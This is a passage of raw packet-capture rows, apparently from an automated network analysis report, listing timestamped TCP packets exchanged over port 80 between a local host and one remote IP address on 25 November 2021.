                                                                                                              Nov 25, 2021 18:14:55.181276083 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.181287050 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.181293011 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.181313038 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.181327105 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.181370020 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.181418896 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.181432962 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.181483984 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.181540966 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.181561947 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.181590080 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.181602001 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.181603909 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.181623936 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.181646109 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.181663036 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.181705952 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.181761026 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.181813002 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.181839943 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.181860924 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.181866884 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.181880951 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.181895971 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.181905031 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.181941986 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.181942940 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.181987047 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.181988001 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.182037115 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.182049990 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.182075977 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.182092905 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.182104111 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.182111979 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.182154894 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.182168007 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.182214022 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.182230949 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.182259083 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.182282925 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.182286024 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.182301998 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.182321072 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.182404995 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.182459116 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.318466902 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.318506956 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.318531036 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.318567991 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.318680048 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.318778038 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.318835020 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.318885088 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.318906069 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.318921089 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.318939924 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.318962097 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.319001913 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.319093943 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.319118023 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.319138050 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.319140911 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.319155931 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.319165945 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.319176912 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.319190979 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.319204092 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.319215059 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.319228888 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.319241047 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.319250107 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.319264889 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.319272995 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.319291115 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.319307089 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.319315910 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.319328070 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.319339037 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.319350958 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.319364071 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.319371939 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.319387913 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.319396973 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.319412947 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.319421053 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.319437027 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.319459915 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.319461107 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.319484949 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.319487095 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.319510937 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.319511890 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.319531918 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.319536924 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.319550991 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.319561005 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.319576979 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.319582939 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.319597960 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.319603920 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.319621086 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.319627047 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.319647074 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.319648027 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.319668055 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.319670916 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.319688082 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.319689989 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.319708109 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.319710970 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.319725990 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.319729090 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.319745064 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.319749117 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.319765091 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.319768906 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.319781065 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.319789886 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.319803953 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.319809914 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.319822073 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.319830894 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.319844961 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.319854975 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.319863081 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.319879055 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.319889069 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.319902897 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.319914103 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.319937944 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.320492983 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.320544958 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.320681095 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.320723057 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.321001053 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.321008921 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.321055889 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.321063995 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.321106911 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.321211100 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.321250916 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.327502012 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.329873085 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.329947948 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.329968929 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.329971075 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.329988003 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.329993963 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.330003977 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.330017090 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.330032110 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.330039024 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.330049992 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.330060959 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.330075979 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.330082893 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.330094099 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.330105066 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.330117941 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.330128908 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.330137968 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.330152035 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.330164909 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.330176115 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.330184937 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.330198050 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.330219030 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.330219984 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.330235958 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.330241919 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.330252886 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.330271006 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.330286980 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.330292940 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.330305099 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.330316067 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.330332994 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.330338955 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.330353975 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.330359936 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.330369949 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.330383062 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.330399036 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.330404997 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.330418110 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.330427885 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.330445051 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.330451965 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.330465078 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.330473900 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.330490112 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.330493927 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.330509901 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.330518007 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.330528975 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.330557108 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.330987930 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.331032038 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.331594944 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.331624985 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.331649065 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.331675053 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.331696987 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.331877947 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.331901073 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.331924915 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.331934929 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.332003117 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.332026005 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.332048893 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.332062006 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.332138062 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.332159996 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.332180977 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.332195044 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.332268000 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.332290888 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.332313061 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.332314014 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.332325935 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.332343102 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.332395077 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.332441092 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.332515955 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.332556963 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.332645893 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.332670927 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.332685947 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.332693100 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.332704067 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.332729101 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.332815886 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.332840919 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.332870960 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.332895994 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.332917929 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.332941055 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.332957983 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.332978010 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.333025932 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.333067894 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.334754944 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.468225956 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.468265057 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.468297005 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.468326092 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.468453884 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.468457937 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.468487978 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.468496084 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.468523026 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.468565941 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.468583107 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.468612909 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.468635082 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.468666077 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.468689919 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.468734026 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.468739986 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.468780041 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.468806028 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.468813896 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.468823910 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.468835115 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.468862057 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.468868971 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.468925953 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.468947887 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.468964100 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.468970060 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.468978882 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.469007015 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.469023943 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.469063044 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.469088078 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.469109058 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.469125986 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.469131947 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.469141006 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.469168901 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.469207048 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.469228983 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.469244003 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.469258070 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.469265938 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.469289064 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.469301939 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.469322920 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.469450951 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.469475985 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.469508886 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.469511986 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.469537973 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.469542027 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.469571114 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.469611883 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.469780922 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.469842911 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.469885111 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.469930887 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.469935894 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.469981909 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.469996929 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.470069885 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.470284939 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.470328093 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.470397949 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.470422029 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.470469952 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.470479012 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.470525980 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.470666885 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.470746040 CET4916580192.168.2.22173.232.204.89
                                                                                                              Nov 25, 2021 18:14:55.470762968 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.470798969 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.470823050 CET8049165173.232.204.89192.168.2.22
                                                                                                              Nov 25, 2021 18:14:55.470824003 CET4916580192.168.2.22173.232.204.89
